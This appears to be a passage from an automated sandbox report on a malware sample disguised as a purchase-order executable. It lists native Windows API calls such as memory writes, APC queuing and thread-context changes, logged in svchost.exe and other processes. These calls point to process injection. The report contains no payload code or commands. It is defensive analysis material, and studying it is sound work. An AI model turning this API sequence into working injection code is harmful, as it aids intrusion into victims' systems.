a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C863 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03974340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03974650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C70 NtFreeVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973D70 NtOpenThread
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA4340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA4650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA39B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA2D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA3090 NtSetValueKey
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA3010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA3D70 NtOpenThread
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02EA3D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_00368DD0 NtCreateFile
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_00368F30 NtReadFile
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_00369020 NtDeleteFile
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_003690C0 NtClose
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_00369220 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_02BDF13A NtQueryInformationProcess
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001BD5EB CreateFileW,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001B1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001BE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0015BF40
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C2046
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00158060
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001B8298
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0018E4FF
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0018676B
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001E4873
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0017CAA0
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0015CAF0
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0016CC39
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00186DD9
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0016B119
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001591C0
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00171394
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00171706
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0017781B
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00157920
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0016997D
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001719B0
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00177A4A
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00171C77
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00177CA7
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001DBE44
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00189EEE
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00171F32
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_036E0A60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418913
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004019A7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004101CA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004101D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004011F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416ADE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416AE3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402B1D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402B20
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004103F3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E473
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403516
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403520
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042EE63
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402700
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393AE0D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03985630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03903FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03903FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B9C32
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_04890C0E
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_04890C05
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_04897519
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_0489751E
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_0488EEAE
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_04890E2E
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_048AF89E
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Code function: 3_2_0489934A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EF02C05_2_02EF02C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F102745_2_02F10274
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F303E65_2_02F303E6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E7E3F05_2_02E7E3F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2A3525_2_02F2A352
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F020005_2_02F02000
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F281CC5_2_02F281CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F241A25_2_02F241A2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F301AA5_2_02F301AA
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EF81585_2_02EF8158
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E601005_2_02E60100
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F0A1185_2_02F0A118
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E8C6E05_2_02E8C6E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E6C7C05_2_02E6C7C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E707705_2_02E70770
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E947505_2_02E94750
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F1E4F65_2_02F1E4F6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F224465_2_02F22446
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F144205_2_02F14420
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F305915_2_02F30591
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E705355_2_02E70535
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E6EA805_2_02E6EA80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F26BD75_2_02F26BD7
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2AB405_2_02F2AB40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E9E8F05_2_02E9E8F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E568B85_2_02E568B8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E728405_2_02E72840
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E7A8405_2_02E7A840
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E729A05_2_02E729A0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F3A9A65_2_02F3A9A6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E869625_2_02E86962
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2EEDB5_2_02F2EEDB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2CE935_2_02F2CE93
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E82E905_2_02E82E90
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E70E595_2_02E70E59
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2EE265_2_02F2EE26
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E7CFE05_2_02E7CFE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E62FC85_2_02E62FC8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EEEFA05_2_02EEEFA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EE4F405_2_02EE4F40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F12F305_2_02F12F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EB2F285_2_02EB2F28
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E90F305_2_02E90F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E60CF25_2_02E60CF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F10CB55_2_02F10CB5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E70C005_2_02E70C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E6ADE05_2_02E6ADE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E88DBF5_2_02E88DBF
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E7AD005_2_02E7AD00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F0CD1F5_2_02F0CD1F
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F112ED5_2_02F112ED
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E8B2C05_2_02E8B2C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E752A05_2_02E752A0
